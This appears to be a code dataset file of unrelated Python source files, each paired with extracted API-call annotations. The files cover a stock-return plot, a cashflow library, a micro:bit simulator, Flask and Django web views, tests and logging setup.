[((133, 148), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (138, 148), False, 'from flask import Flask, request, render_template\n'), ((305, 334), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (320, 334), False, 'from flask import Flask, request, render_template\n'), ((625, 650), 'inference.save_image', 'save_image', (['file', '"""input"""'], {}), "(file, 'input')\n", (635, 650), False, 'from inference import get_category, save_image\n'), ((870, 906), 'inference.get_category', 'get_category', ([], {'img': 'file', 'model': 'model1'}), '(img=file, model=model1)\n', (882, 906), False, 'from inference import get_category, save_image\n'), ((957, 993), 'inference.get_category', 'get_category', ([], {'img': 'file', 'model': 'model2'}), '(img=file, model=model2)\n', (969, 993), False, 'from inference import get_category, save_image\n'), ((1004, 1040), 'inference.get_category', 'get_category', ([], {'img': 'file', 'model': 'model3'}), '(img=file, model=model3)\n', (1016, 1040), False, 'from inference import get_category, save_image\n'), ((1095, 1170), 'flask.render_template', 'render_template', (['"""result.html"""'], {'model1': 'model1', 'model2': 'model2', 'model3': 'model3'}), "('result.html', model1=model1, model2=model2, model3=model3)\n", (1110, 1170), False, 'from flask import Flask, request, render_template\n')]
|
from matplotlib.finance import quotes_historical_yahoo
import sys
from datetime import date
import matplotlib.pyplot as plt
import numpy as np
today = date.today()
start = (today.year - 1, today.month, today.day)
symbol = 'DISH'
if len(sys.argv) == 2:
symbol = sys.argv[1]
quotes = quotes_historical_yahoo(symbol, start, today)
quotes = np.array(quotes)
close = quotes.T[4]
volume = quotes.T[5]
ret = np.diff(close)/close[:-1]
volchange = np.diff(volume)/volume[:-1]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(ret, volchange, c=ret * 100, s=volchange * 100, alpha=0.5)
ax.set_title('Close and volume returns')
ax.grid(True)
plt.show()
|
[
"matplotlib.finance.quotes_historical_yahoo",
"matplotlib.pyplot.show",
"datetime.date.today",
"matplotlib.pyplot.figure",
"numpy.diff",
"numpy.array"
] |
[((152, 164), 'datetime.date.today', 'date.today', ([], {}), '()\n', (162, 164), False, 'from datetime import date\n'), ((289, 334), 'matplotlib.finance.quotes_historical_yahoo', 'quotes_historical_yahoo', (['symbol', 'start', 'today'], {}), '(symbol, start, today)\n', (312, 334), False, 'from matplotlib.finance import quotes_historical_yahoo\n'), ((344, 360), 'numpy.array', 'np.array', (['quotes'], {}), '(quotes)\n', (352, 360), True, 'import numpy as np\n'), ((481, 493), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (491, 493), True, 'import matplotlib.pyplot as plt\n'), ((646, 656), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (654, 656), True, 'import matplotlib.pyplot as plt\n'), ((408, 422), 'numpy.diff', 'np.diff', (['close'], {}), '(close)\n', (415, 422), True, 'import numpy as np\n'), ((446, 461), 'numpy.diff', 'np.diff', (['volume'], {}), '(volume)\n', (453, 461), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
# dcf
# ---
# A Python library for generating discounted cashflows.
#
# Author: sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]
# Version: 0.7, copyright Tuesday, 31 May 2022
# Website: https://github.com/sonntagsgesicht/dcf
# License: Apache License 2.0 (see LICENSE file)
from collections import OrderedDict
from inspect import signature
from warnings import warn
from ..plans import DEFAULT_AMOUNT
from .payoffs import FixedCashFlowPayOff, RateCashFlowPayOff
class CashFlowList(object):
_cashflow_details = 'cashflow', 'pay date'
@property
def table(self):
""" cashflow details as list of tuples """
# print(tabulate(cf.table, headers='firstrow')) # for pretty print
header, table = list(), list()
for d in self.domain:
payoff = self._flows.get(d, 0.)
if hasattr(payoff, 'details'):
fwd = getattr(self, 'forward_curve', None)
details = payoff.details(fwd)
details['pay date'] = d
else:
details = {'cashflow': float(payoff), 'pay date': d}
for k in self.__class__._cashflow_details:
if k in details and k not in header:
header.append(k)
table.append(tuple(details.get(h, '') for h in header))
return [tuple(header)] + table
@property
def domain(self):
""" payment date list """
return self._domain
@property
def origin(self):
""" cashflow list start date """
if self._origin is None and self._domain:
return self._domain[0]
return self._origin
@property
def kwargs(self):
"""returns constructor arguments as ordered dictionary
(under construction)
"""
warn('%s().kwargs is under construction' % self.__class__.__name__)
kw = OrderedDict()
for name in signature(self.__class__).parameters:
attr = None
if name == 'amount_list':
attr = tuple(self._flows[d] for d in self.domain)
if name == 'payment_date_list':
attr = self.domain
attr = getattr(self, '_' + name, attr)
if isinstance(attr, (list, tuple)):
attr = tuple(getattr(a, 'kwargs', a) for a in attr)
attr = tuple(getattr(a, '__name__', a) for a in attr)
attr = getattr(attr, 'kwargs', attr)
attr = getattr(attr, '__name__', attr)
if attr is not None:
kw[name] = attr
return kw
def payoff(self, date):
"""dictionary of payoffs with pay_date keys"""
if isinstance(date, (tuple, list)):
return tuple(self.payoff(i) for i in date)
return self._flows.get(date, None)
def __init__(self, payment_date_list=(), amount_list=(), origin=None):
""" basic cashflow list object
:param domain: list of cashflow dates
:param data: list of cashflow amounts
:param origin: origin of object,
i.e. start date of the cashflow list as a product
Basicly |CashFlowList()| works like a read-only dictionary
with payment dates as keys.
And the |CashFlowList().domain| property holds the payment date list.
>>> from dcf import CashFlowList
>>> cf_list = CashFlowList([0, 1], [-100., 100.])
>>> cf_list.domain
(0, 1)
In order to get cashflows
>>> cf_list[0]
-100.0
>>> cf_list[cf_list.domain]
(-100.0, 100.0)
This works even for dates without cashflow
>>> cf_list[-1, 0 , 1, 2]
(0.0, -100.0, 100.0, 0.0)
"""
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
if not len(amount_list) == len(payment_date_list):
msg = f"{self.__class__.__name__} arguments " \
f"`payment_date_list` and `amount_list` " \
f"must have same length."
raise ValueError(msg)
self._origin = origin
self._domain = tuple(payment_date_list)
self._flows = dict(zip(payment_date_list, amount_list))
def __getitem__(self, item):
if isinstance(item, (tuple, list)):
return tuple(self[i] for i in item)
else:
payoff = self._flows.get(item, 0.)
if not isinstance(payoff, (int, float)):
_ = None
if hasattr(self, 'payoff_model'):
_ = self.payoff_model
elif hasattr(self, 'forward_curve'):
_ = self.forward_curve
payoff = payoff(_)
return payoff
def __call__(self, _=None):
flows = list()
for item in self.domain:
payoff = self._flows.get(item, 0.)
if not isinstance(payoff, (int, float)):
if _ is None:
if hasattr(self, 'payoff_model'):
_ = self.payoff_model
elif hasattr(self, 'forward_curve'):
_ = self.forward_curve
payoff = payoff(_)
flows.append(payoff)
return CashFlowList(self.domain, flows, self._origin)
def __add__(self, other):
for k in self._flows:
self._flows[k].__add__(other)
def __sub__(self, other):
for k in self._flows:
self._flows[k].__sub__(other)
def __mul__(self, other):
for k in self._flows:
self._flows[k].__mul__(other)
def __truediv__(self, other):
for k in self._flows:
self._flows[k].__truediv__(other)
def __str__(self):
inner = tuple()
if self.domain:
s, e = self.domain[0], self.domain[-1]
inner = f'[{s!r} ... {e!r}]', \
f'[{self._flows[s]!r} ... {self._flows[e]!r}]'
kw = self.kwargs
kw.pop('amount_list', ())
kw.pop('payment_date_list', ())
inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
s = self.__class__.__name__ + '(' + ', '.join(inner) + ')'
return s
def __repr__(self):
s = self.__class__.__name__ + '()'
if self.domain:
fill = ',\n' + ' ' * (len(s) - 1)
kw = self.kwargs
inner = \
str(kw.pop('payment_date_list', ())), \
str(kw.pop('amount_list', ()))
inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
s = self.__class__.__name__ + '(' + fill.join(inner) + ')'
return s
class CashFlowLegList(CashFlowList):
""" MultiCashFlowList """
@property
def legs(self):
""" list of |CashFlowList| """
return list(self._legs)
def __init__(self, legs):
""" container class for CashFlowList
:param legs: list of |CashFlowList|
"""
for leg in legs:
if not isinstance(leg, (CashFlowList, RateCashFlowList)):
cls = self.__class__.__name__, leg.__class__.__name__
raise ValueError("Legs %s of can be either `CashFlowList` "
"or `RateCashFlowList` but not %s." % cls)
self._legs = legs
domains = tuple(tuple(leg.domain) for leg in self._legs)
domain = list(sorted(set().union(*domains)))
origin = min(leg.origin for leg in self._legs)
super().__init__(domain, [0] * len(domain), origin=origin)
def __getitem__(self, item):
""" getitem does re-calc float cash flows and
does not use store notional values """
if isinstance(item, (tuple, list)):
return tuple(self[i] for i in item)
else:
return sum(
float(leg[item]) for leg in self._legs if item in leg.domain)
def __add__(self, other):
for leg in self._legs:
leg.__add__(other)
def __sub__(self, other):
for leg in self._legs:
leg.__sub__(other)
def __mul__(self, other):
for leg in self._legs:
leg.__mul__(other)
def __truediv__(self, other):
for leg in self._legs:
leg.__truediv__(other)
class FixedCashFlowList(CashFlowList):
_header_keys = 'cashflow', 'pay date'
def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
origin=None):
""" basic cashflow list object
:param payment_date_list: list of cashflow payment dates
:param amount_list: list of cashflow amounts
:param origin: origin of object,
i.e. start date of the cashflow list as a product
"""
if isinstance(payment_date_list, CashFlowList):
amount_list = payment_date_list[payment_date_list.domain]
origin = origin or getattr(payment_date_list, '_origin', None)
payment_date_list = payment_date_list.domain
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
payoff_list = tuple(FixedCashFlowPayOff(amount=a) for a in amount_list)
super().__init__(payment_date_list, payoff_list, origin=origin)
class RateCashFlowList(CashFlowList):
""" list of cashflows by interest rate payments """
_cashflow_details = 'cashflow', 'pay date', 'notional', \
'start date', 'end date', 'year fraction', \
'fixed rate', 'forward rate', 'fixing date', 'tenor'
def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
origin=None, day_count=None,
fixing_offset=None, pay_offset=None,
fixed_rate=0., forward_curve=None):
r""" list of interest rate cashflows
:param payment_date_list: pay dates, assuming that pay dates agree
with end dates of interest accrued period
:param amount_list: notional amounts
:param origin: start date of first interest accrued period
:param day_count: day count convention
:param fixing_offset: time difference between
interest rate fixing date and interest period payment date
:param pay_offset: time difference between
interest period end date and interest payment date
:param fixed_rate: agreed fixed rate
:param forward_curve: interest rate curve for forward estimation
Let $t_0$ be the list **origin**
and $t_i$ $i=1, \dots n$ the **payment_date_list**
with $N_i$ $i=1, \dots n$ the notional **amount_list**.
Moreover, let $\tau$ be the **day_count** function,
$c$ the **fixed_rate** and $f$ the **forward_curve**.
Then, the rate cashflow $cf_i$ payed at time $t_i$ will be
with
$s_i = t_{i-1} - \delta$,
$e_i = t_i -\delta$
as well as
$d_i = s_i - \epsilon$
for **pay_offset** $\delta$ and **fixing_offset** $\epsilon$,
$$cf_i = N_i \cdot \tau(s_i,e_i) \cdot (c + f(d_i)).$$
Note, the **pay_offset** $\delta$ is not applied
in case of the first cashflow, then $s_1=t_0$.
"""
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
if origin is not None:
start_dates = [origin]
start_dates.extend(payment_date_list[:-1])
elif origin is None and len(payment_date_list) > 1:
step = payment_date_list[1] - payment_date_list[0]
start_dates = [payment_date_list[0] - step]
start_dates.extend(payment_date_list[:-1])
elif payment_date_list:
start_dates = payment_date_list
payoff_list = list()
for s, e, a in zip(start_dates, payment_date_list, amount_list):
if pay_offset:
e -= pay_offset
s -= pay_offset
payoff = RateCashFlowPayOff(
start=s, end=e, day_count=day_count,
fixing_offset=fixing_offset, amount=a,
fixed_rate=fixed_rate
)
payoff_list.append(payoff)
super().__init__(payment_date_list, payoff_list, origin=origin)
self.forward_curve = forward_curve
r""" cashflow forward curve to derive float rates $f$ """
@property
def fixed_rate(self):
fixed_rates = tuple(cf.fixed_rate for cf in self._flows.values())
if len(set(fixed_rates)) == 1:
return fixed_rates[0]
@fixed_rate.setter
def fixed_rate(self, value):
for cf in self._flows.values():
cf.fixed_rate = value
|
[
"collections.OrderedDict",
"warnings.warn",
"inspect.signature"
] |
[((1831, 1898), 'warnings.warn', 'warn', (["('%s().kwargs is under construction' % self.__class__.__name__)"], {}), "('%s().kwargs is under construction' % self.__class__.__name__)\n", (1835, 1898), False, 'from warnings import warn\n'), ((1912, 1925), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1923, 1925), False, 'from collections import OrderedDict\n'), ((1946, 1971), 'inspect.signature', 'signature', (['self.__class__'], {}), '(self.__class__)\n', (1955, 1971), False, 'from inspect import signature\n')]
|
import tkinter as tk
import time
# Routine for non-implemented features.
def NOTIMPLEMENTED():
print(">>> Not implemented <<<")
# Simulate the face buttons.
class MicrobitButton(tk.Button):
def setup(self):
self.presses = 0
self.state = False
self.bind("<Button-1>", self.bpress)
self.bind("<ButtonRelease-1>", self.bunpress)
def get_presses(self):
return self.presses
def is_pressed(self):
return self.state
def bpress(self,x):
self.state = True
def bunpress(self,x):
self.state = False
self.increment()
def increment(self):
self.presses = self.presses + 1
class Image:
def __init__(self):
self.data = [x[:] for x in [[0] * 5] * 5]
def __init__(self, image_data):
self.data = [x[:] for x in [[0] * 5] * 5]
if type(image_data) is str:
if len(image_data) == 1:
NOTIMPLEMENTED()
else:
l = image_data.split(":")
for j in range(5):
for i in range(5):
self.data[i][j] = int(l[j][i])
else:
for j in range(5):
for i in range(5):
self.data[i][j] = int(image_data[j][i])
class ledpack:
def __init__(self, canvas, context):
self.context = context
self.leds = [x[:] for x in [[0] * 5] * 5]
self.canvas = canvas
self.draw_leds()
self.turnedon=True
def draw_leds(self):
self.canvas.create_rectangle(0,0,200,200,fill='black')
for i in range(5):
for j in range(5):
if self.leds[i][j] >= 1:
shade = hex(int((self.leds[i][j] * 32) - 1))[2:]
if len(shade) == 1:
shade = "0" + shade
shade = "#" + shade + "0000"
self.canvas.create_rectangle(i*40,j*40,(i+1)*40,(j+1)*40,fill=shade)
self.canvas.update_idletasks()
self.context.update()
def set_pixel(self, x, y, value):
self.leds[x][y] = value
self.draw_leds()
def get_pixel(self, x, y):
return self.leds[x][y]
def clear(self):
self.leds = [x[:] for x in [[0] * 5] * 5]
self.draw_leds()
def on(self):
self.turnedon = True
def off(self):
self.turnedon = False
def is_on(self):
return self.turnedon
def read_light_level(self):
NOTIMPLEMENTED()
return 0
def scroll(self, value, delay=400, wait=True, loop=False, monospace=False):
NOTIMPLEMENTED()
def show(self, image):
for i in range(5):
for j in range(5):
self.leds[i][j] = image.data[i][j]
self.draw_leds()
# Set up stuff when imported.
_mb_win = tk.Tk()
_mb_win.title("Macro:Bit")
button_a = MicrobitButton(_mb_win, text="A")
button_b = MicrobitButton(_mb_win, text="B")
button_a.setup()
button_b.setup()
button_a.pack(side=tk.LEFT)
button_b.pack(side=tk.RIGHT)
_mb_can = tk.Canvas(_mb_win, width=200, height=200)
display = ledpack(_mb_can, _mb_win)
_mb_can.pack(expand=tk.YES, fill=tk.BOTH)
|
[
"tkinter.Canvas",
"tkinter.Tk"
] |
[((2331, 2338), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (2336, 2338), True, 'import tkinter as tk\n'), ((2558, 2599), 'tkinter.Canvas', 'tk.Canvas', (['_mb_win'], {'width': '(200)', 'height': '(200)'}), '(_mb_win, width=200, height=200)\n', (2567, 2599), True, 'import tkinter as tk\n')]
|
import numpy as np
def test_rotation():
board_size = 3
states = np.array([[[[1, 2, 0],
[2, 1, 0],
[0, 1, 2]]],
[[[0, 3, 4],
[0, 0, 0],
[2, 1, 0]]]])
visit_counts = np.array([[0, 0, 3,
0, 0, 2,
1, 0, 0],
[5, 0, 0,
6, 7, 8,
0, 0, 9]])
new_states = []
new_visit_counts = []
for state, visit_count in zip(states, visit_counts):
for i in range(4):
rotated_state = np.rot90(state, i, axes=(1, 2))
rotated_visit_count = np.rot90(visit_count.reshape(board_size, board_size), i, axes=(0, 1))
new_states.append(rotated_state)
new_visit_counts.append(rotated_visit_count)
new_states.append(np.flip(rotated_state, 2))
new_visit_counts.append(np.fliplr(rotated_visit_count))
for i, (state, visit_count) in enumerate(zip(new_states, new_visit_counts)):
print("case: ", i)
for i in range(3):
for j in range(3):
print(state[0][i][j], end=' ')
print('')
print('')
for i in range(3):
for j in range(3):
print(visit_count[i][j], end=' ')
print('')
print('')
if __name__ == "__main__":
test_rotation()
|
[
"numpy.fliplr",
"numpy.rot90",
"numpy.array",
"numpy.flip"
] |
[((74, 163), 'numpy.array', 'np.array', (['[[[[1, 2, 0], [2, 1, 0], [0, 1, 2]]], [[[0, 3, 4], [0, 0, 0], [2, 1, 0]]]]'], {}), '([[[[1, 2, 0], [2, 1, 0], [0, 1, 2]]], [[[0, 3, 4], [0, 0, 0], [2, \n 1, 0]]]])\n', (82, 163), True, 'import numpy as np\n'), ((301, 369), 'numpy.array', 'np.array', (['[[0, 0, 3, 0, 0, 2, 1, 0, 0], [5, 0, 0, 6, 7, 8, 0, 0, 9]]'], {}), '([[0, 0, 3, 0, 0, 2, 1, 0, 0], [5, 0, 0, 6, 7, 8, 0, 0, 9]])\n', (309, 369), True, 'import numpy as np\n'), ((679, 710), 'numpy.rot90', 'np.rot90', (['state', 'i'], {'axes': '(1, 2)'}), '(state, i, axes=(1, 2))\n', (687, 710), True, 'import numpy as np\n'), ((948, 973), 'numpy.flip', 'np.flip', (['rotated_state', '(2)'], {}), '(rotated_state, 2)\n', (955, 973), True, 'import numpy as np\n'), ((1011, 1041), 'numpy.fliplr', 'np.fliplr', (['rotated_visit_count'], {}), '(rotated_visit_count)\n', (1020, 1041), True, 'import numpy as np\n')]
|
from unittest import TestCase
from mock import patch
from pykongregate.api import _handle_request
from pykongregate.exceptions import NullResponseException
class TestApi(TestCase):
def test_base_request(self):
with patch('requests.get') as patch_get:
class _Temp(object):
def __init__(self):
self.text = ''
patch_get.side_effect = [_Temp()]
url = 'www.example.com'
self.assertRaises(
NullResponseException,
_handle_request,
url, {},
)
with patch('requests.get') as patch_get:
class _Temp(object):
def __init__(self):
self.text = '{"hello_world": "hello_world"}'
patch_get.side_effect = [_Temp()]
url = 'www.example.com'
params = {}
response = _handle_request(url, params)
self.assertEqual(
response, {"hello_world": "hello_world"}
)
|
[
"pykongregate.api._handle_request",
"mock.patch"
] |
[((232, 253), 'mock.patch', 'patch', (['"""requests.get"""'], {}), "('requests.get')\n", (237, 253), False, 'from mock import patch\n'), ((610, 631), 'mock.patch', 'patch', (['"""requests.get"""'], {}), "('requests.get')\n", (615, 631), False, 'from mock import patch\n'), ((910, 938), 'pykongregate.api._handle_request', '_handle_request', (['url', 'params'], {}), '(url, params)\n', (925, 938), False, 'from pykongregate.api import _handle_request\n')]
|
import logging
import sys
from flask import Flask, send_from_directory, jsonify
from flask_jwt_extended import JWTManager
from api.utils.database import db
from api.utils.responses import response_with
import api.utils.responses as resp
from api.utils.email import mail
from api.routes.authors import author_routes
from api.routes.books import book_routes
from api.routes.users import user_routes
from flask_swagger import swagger
from flask_swagger_ui import get_swaggerui_blueprint
def create_app(config):
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(author_routes, url_prefix='/api/authors')
app.register_blueprint(book_routes, url_prefix='/api/books')
app.register_blueprint(user_routes, url_prefix='/api/users')
SWAGGER_URL = '/api/docs'
swaggerui_blueprint = get_swaggerui_blueprint('/api/docs', '/api/spec',
config={
'app_name': "Flask Author DB"})
app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)
@app.route('/avatar/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
@app.after_request
def add_header(response):
return response
@app.errorhandler(400)
def bad_request(e):
logging.error(e)
return response_with(resp.BAD_REQUEST_400)
@app.errorhandler(500)
def server_error(e):
logging.error(e)
return response_with(resp.SERVER_ERROR_500)
@app.errorhandler(404)
def not_found(e):
logging.error(e)
return response_with(resp.SERVER_ERROR_404)
@app.route('/api/spec')
def spec():
swag = swagger(app, prefix='/api')
swag['info']['base'] = "http://localhost:5000"
swag['info']['version'] = "1.0"
swag['info']['title'] = "Flask Author DB"
return jsonify(swag)
jwt = JWTManager(app)
mail.init_app(app)
db.init_app(app)
with app.app_context():
db.create_all()
logging.basicConfig(stream=sys.stdout,
format='%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s',
level=logging.DEBUG)
return app
if __name__ == '__main__':
import os
from api.config.config import ProductionConfig, TestingConfig, \
DevelopmentConfig
if os.environ.get('WORK_ENV') == 'PROD':
app_config = ProductionConfig
elif os.environ.get('WORK_ENV') == 'TEST':
app_config = TestingConfig
else:
app_config = DevelopmentConfig
app = create_app(app_config)
app.run(port=5000, host='0.0.0.0', use_reloader=True)
|
[
"api.utils.database.db.init_app",
"flask_jwt_extended.JWTManager",
"logging.error",
"logging.basicConfig",
"flask.Flask",
"api.utils.responses.response_with",
"api.utils.database.db.create_all",
"os.environ.get",
"flask.jsonify",
"api.utils.email.mail.init_app",
"flask_swagger.swagger",
"flask.send_from_directory",
"flask_swagger_ui.get_swaggerui_blueprint"
] |
[((523, 538), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (528, 538), False, 'from flask import Flask, send_from_directory, jsonify\n'), ((831, 924), 'flask_swagger_ui.get_swaggerui_blueprint', 'get_swaggerui_blueprint', (['"""/api/docs"""', '"""/api/spec"""'], {'config': "{'app_name': 'Flask Author DB'}"}), "('/api/docs', '/api/spec', config={'app_name':\n 'Flask Author DB'})\n", (854, 924), False, 'from flask_swagger_ui import get_swaggerui_blueprint\n'), ((1979, 1994), 'flask_jwt_extended.JWTManager', 'JWTManager', (['app'], {}), '(app)\n', (1989, 1994), False, 'from flask_jwt_extended import JWTManager\n'), ((1999, 2017), 'api.utils.email.mail.init_app', 'mail.init_app', (['app'], {}), '(app)\n', (2012, 2017), False, 'from api.utils.email import mail\n'), ((2023, 2039), 'api.utils.database.db.init_app', 'db.init_app', (['app'], {}), '(app)\n', (2034, 2039), False, 'from api.utils.database import db\n'), ((2097, 2238), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'format': '"""%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s"""', 'level': 'logging.DEBUG'}), "(stream=sys.stdout, format=\n '%(asctime)s|%(levelname)s|%(filename)s:%(lineno)s|%(message)s', level=\n logging.DEBUG)\n", (2116, 2238), False, 'import logging\n'), ((1184, 1242), 'flask.send_from_directory', 'send_from_directory', (["app.config['UPLOAD_FOLDER']", 'filename'], {}), "(app.config['UPLOAD_FOLDER'], filename)\n", (1203, 1242), False, 'from flask import Flask, send_from_directory, jsonify\n'), ((1381, 1397), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (1394, 1397), False, 'import logging\n'), ((1413, 1448), 'api.utils.responses.response_with', 'response_with', (['resp.BAD_REQUEST_400'], {}), '(resp.BAD_REQUEST_400)\n', (1426, 1448), False, 'from api.utils.responses import response_with\n'), ((1510, 1526), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (1523, 1526), False, 'import logging\n'), ((1542, 1578), 'api.utils.responses.response_with', 'response_with', (['resp.SERVER_ERROR_500'], {}), '(resp.SERVER_ERROR_500)\n', (1555, 1578), False, 'from api.utils.responses import response_with\n'), ((1637, 1653), 'logging.error', 'logging.error', (['e'], {}), '(e)\n', (1650, 1653), False, 'import logging\n'), ((1669, 1705), 'api.utils.responses.response_with', 'response_with', (['resp.SERVER_ERROR_404'], {}), '(resp.SERVER_ERROR_404)\n', (1682, 1705), False, 'from api.utils.responses import response_with\n'), ((1766, 1793), 'flask_swagger.swagger', 'swagger', (['app'], {'prefix': '"""/api"""'}), "(app, prefix='/api')\n", (1773, 1793), False, 'from flask_swagger import swagger\n'), ((1954, 1967), 'flask.jsonify', 'jsonify', (['swag'], {}), '(swag)\n', (1961, 1967), False, 'from flask import Flask, send_from_directory, jsonify\n'), ((2076, 2091), 'api.utils.database.db.create_all', 'db.create_all', ([], {}), '()\n', (2089, 2091), False, 'from api.utils.database import db\n'), ((2439, 2465), 'os.environ.get', 'os.environ.get', (['"""WORK_ENV"""'], {}), "('WORK_ENV')\n", (2453, 2465), False, 'import os\n'), ((2524, 2550), 'os.environ.get', 'os.environ.get', (['"""WORK_ENV"""'], {}), "('WORK_ENV')\n", (2538, 2550), False, 'import os\n')]
|
from django.http import Http404
from django.shortcuts import render, redirect
from users.models import Profile, Team
from .forms import MultiBadgeForm
from django.contrib.auth.decorators import login_required
from .models import Points
from webpages.models import Banner, Visibility
from webpages.utils import return_camp_id
@login_required
def give_award(request):
if request.user.is_superuser:
if request.method == 'GET':
form = MultiBadgeForm()
return render(request, 'award/give_award.html', context={'form': form})
else:
form = MultiBadgeForm(request.POST)
if form.is_valid():
users = form.cleaned_data.get('users')
teams = form.cleaned_data.get('teams')
heading = form.cleaned_data.get('heading')
pr_type = form.cleaned_data.get('type')
points = form.cleaned_data.get('points')
show = form.cleaned_data.get('show')
if len(users) != 0:
for user in users:
Points.objects.create(user=user, heading=heading, type=pr_type, points=points, show=show)
elif teams:
Points.objects.create(team=teams, heading=heading, type=pr_type, points=points, show=show)
return redirect('give_award')
else:
raise Http404()
# display the list of points given including only top 3
def award_list(request, camp):
camp_id = return_camp_id(camp)
awards = Points.objects.filter(show=True, camp=camp_id)
users = awards.filter(team=None)
teams = awards.filter(user=None)
display = Visibility.objects.filter(camp=camp_id).first().awards
image = Banner.objects.filter(camp=camp_id).first().awards
context = {
"teams": teams,
'users': users,
'display': display,
'banner': image,
'camp_id': camp_id,
'title': f'{camp.upper()} AWARD LIST'
}
return render(request, 'award/award_list.html', context=context)
# show the leaderboard of teams and profiles use points in corresponding models to order
def leaderboard(request, camp):
camp_id = return_camp_id(camp)
team_profiles = ""
team_points = ""
profiles = Profile.objects.filter(camps=camp_id).order_by('-points')[:10]
teams = Team.objects.filter(camp=camp_id).order_by("-team_points")[:10]
if request.user.profile.team:
team_profiles = Profile.objects.filter(team=request.user.profile.team).order_by('-points')
team_points = Team.objects.get(id=request.user.profile.team.id)
display = Visibility.objects.filter(camp=camp_id).first().leaderboard
image = Banner.objects.filter(camp=camp_id).first().leaderboard
context = {
'profiles': profiles,
'teams': teams,
'team_profiles': team_profiles,
'team_details': team_points,
'display': display,
'banner': image,
'camp_id': camp_id,
'title': f'{camp.upper()} LEADERBOARD'
}
return render(request, 'award/leaderboard.html', context=context)
|
[
"users.models.Team.objects.get",
"webpages.models.Banner.objects.filter",
"webpages.models.Visibility.objects.filter",
"django.shortcuts.redirect",
"webpages.utils.return_camp_id",
"users.models.Team.objects.filter",
"django.http.Http404",
"users.models.Profile.objects.filter",
"django.shortcuts.render"
] |
[((1500, 1520), 'webpages.utils.return_camp_id', 'return_camp_id', (['camp'], {}), '(camp)\n', (1514, 1520), False, 'from webpages.utils import return_camp_id\n'), ((1997, 2054), 'django.shortcuts.render', 'render', (['request', '"""award/award_list.html"""'], {'context': 'context'}), "(request, 'award/award_list.html', context=context)\n", (2003, 2054), False, 'from django.shortcuts import render, redirect\n'), ((2192, 2212), 'webpages.utils.return_camp_id', 'return_camp_id', (['camp'], {}), '(camp)\n', (2206, 2212), False, 'from webpages.utils import return_camp_id\n'), ((3053, 3111), 'django.shortcuts.render', 'render', (['request', '"""award/leaderboard.html"""'], {'context': 'context'}), "(request, 'award/leaderboard.html', context=context)\n", (3059, 3111), False, 'from django.shortcuts import render, redirect\n'), ((1387, 1396), 'django.http.Http404', 'Http404', ([], {}), '()\n', (1394, 1396), False, 'from django.http import Http404\n'), ((2566, 2615), 'users.models.Team.objects.get', 'Team.objects.get', ([], {'id': 'request.user.profile.team.id'}), '(id=request.user.profile.team.id)\n', (2582, 2615), False, 'from users.models import Profile, Team\n'), ((495, 559), 'django.shortcuts.render', 'render', (['request', '"""award/give_award.html"""'], {'context': "{'form': form}"}), "(request, 'award/give_award.html', context={'form': form})\n", (501, 559), False, 'from django.shortcuts import render, redirect\n'), ((1340, 1362), 'django.shortcuts.redirect', 'redirect', (['"""give_award"""'], {}), "('give_award')\n", (1348, 1362), False, 'from django.shortcuts import render, redirect\n'), ((1669, 1708), 'webpages.models.Visibility.objects.filter', 'Visibility.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (1694, 1708), False, 'from webpages.models import Banner, Visibility\n'), ((1736, 1771), 'webpages.models.Banner.objects.filter', 'Banner.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (1757, 1771), False, 'from webpages.models import Banner, Visibility\n'), ((2272, 2309), 'users.models.Profile.objects.filter', 'Profile.objects.filter', ([], {'camps': 'camp_id'}), '(camps=camp_id)\n', (2294, 2309), False, 'from users.models import Profile, Team\n'), ((2347, 2380), 'users.models.Team.objects.filter', 'Team.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (2366, 2380), False, 'from users.models import Profile, Team\n'), ((2469, 2523), 'users.models.Profile.objects.filter', 'Profile.objects.filter', ([], {'team': 'request.user.profile.team'}), '(team=request.user.profile.team)\n', (2491, 2523), False, 'from users.models import Profile, Team\n'), ((2631, 2670), 'webpages.models.Visibility.objects.filter', 'Visibility.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (2656, 2670), False, 'from webpages.models import Banner, Visibility\n'), ((2703, 2738), 'webpages.models.Banner.objects.filter', 'Banner.objects.filter', ([], {'camp': 'camp_id'}), '(camp=camp_id)\n', (2724, 2738), False, 'from webpages.models import Banner, Visibility\n')]
|
# coding= utf8
import logging
logger = logging.getLogger("ikpy")
stream_handler = logging.StreamHandler()
logger.setLevel(logging.WARNING)
logger.addHandler(stream_handler)
def set_log_level(level):
logger.setLevel(level)
|
[
"logging.StreamHandler",
"logging.getLogger"
] |
[((40, 65), 'logging.getLogger', 'logging.getLogger', (['"""ikpy"""'], {}), "('ikpy')\n", (57, 65), False, 'import logging\n'), ((83, 106), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (104, 106), False, 'import logging\n')]
|